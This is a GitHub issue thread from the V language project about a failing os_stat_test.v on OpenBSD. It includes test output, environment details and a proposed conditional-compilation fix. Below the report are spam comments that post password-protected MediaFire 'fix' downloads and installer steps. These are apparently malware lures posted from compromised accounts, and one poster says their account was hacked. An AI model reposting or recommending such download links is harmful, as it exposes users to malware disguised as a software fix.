### ISSUE TITLE
Test failed on OpenBSD for vlib/os/os_stat_test.v

### ISSUE THREAD

**Issue by lcheylus** [vlang/v#22123]
### Describe the bug

With the latest version ov V on OpenBSD current/amd64 (future version 7.6), tests failed for `vlib/os/os_stat_test.v`.

### Reproduction Steps

- Build V on OpenBSD current/amd64 with clang
- Run tests for `vlib/os/os_stat_test.v`: `./v test vlib/os/os_stat_test.v`

### Expected Behavior

No error when running tests for `vlib/os/os_stat_test.v`

### Current Behavior

Error when running tests for `vlib/os/os_stat_test.v`:
```bash
./v test vlib/os/os_stat_test.v
---- Testing... ----
 FAIL     7.932 ms vlib/os/os_stat_test.v
         retry: 1
      comp_cmd: '/home/fox/dev/vlang.git/v' -skip-running   -o '/tmp/v_1000/tsession_54077d236f8_01J6BWGGSW5RFWPYYZ2Y7H3SE3/0_0/os_stat_test' '/home/fox/dev/vlang.git/vlib/os/os_stat_test.v'
       run_cmd: '/tmp/v_1000/tsession_54077d236f8_01J6BWGGSW5RFWPYYZ2Y7H3SE3/0_0/os_stat_test'
failure code: 1; foutput.len: 706; failure output:
---------------------------------------------------------------------------------------------------- retry: 0 ; max_retry: 0 ; r.exit_code: 1 ; trimmed_output.len: 538
/home/fox/dev/vlang.git/vlib/os/os_stat_test.v:24, main.test_stat
 |  start_time: 1724828370
 |    end_time: 1724828372
 | fstat.ctime: 1724828372
 | fstat.mtime: 1724828372
/home/fox/dev/vlang.git/vlib/os/os_stat_test.v:60: ✗ fn test_stat
   > assert fstat.rdev == dstat.rdev, 'File and directory should have same device ID'
     Left value: 1247457
    Right value: 1247456
        Message: File and directory should have same device ID
----
Failed command 1:    '/home/fox/dev/vlang.git/v' -skip-running   -o '/tmp/v_1000/tsession_54077d236f8_01J6BWGGSW5RFWPYYZ2Y7H3SE3/0_0/os_stat_test' '/home/fox/dev/vlang.git/vlib/os/os_stat_test.v'
Summary for all V _test.v files: 1 failed, 1 total. Elapsed time: 2611 ms, on 1 job. Comptime: 2565 ms. Runtime: 7 ms.
```

### Possible Solution

In `vlib/os/os_stat_test.v`, line 58, add an exception for OpenBSD (Conditionnal compilation for OS), same as for FreeBSD: `$if !freebsd && !openbsd`

I will post a PR ASAP to fix this issue.

### V version

V 0.4.7 1085f45

### Environment details (OS name and version, etc.)

V full version: V 0.4.7 7baff15
OS: openbsd, 7.6, GENERIC.MP#279
Processor: 2 cpus, 64bit, little endian

getwd: /home/fox/dev/vlang.git
vexe: /home/fox/dev/vlang.git/v
vexe mtime: 2024-08-27 13:57:26

vroot: OK, value: /home/fox/dev/vlang.git
VMODULES: OK, value: /home/fox/.vmodules
VTMP: OK, value: /tmp/v_1000

Git version: git version 2.46.0
Git vroot status: weekly.2024.34-49-g05c7aa2c-dirty
.git/config present: true

CC version: OpenBSD clang version 16.0.6
thirdparty/tcc status: thirdparty-unknown-unknown de82a130
> [!NOTE]
> You can use the 👍 reaction to increase the issue's priority for developers.
>
> Please note that only the 👍 reaction to the issue itself counts as a vote.
> Other reactions and those to comments will not be taken into account.

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by internet-person** [comment]
my account got hacked, dont open the link.

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by internet-person** [comment]
jesus christ its spreading was i patient zero for a digital zombies outbreak
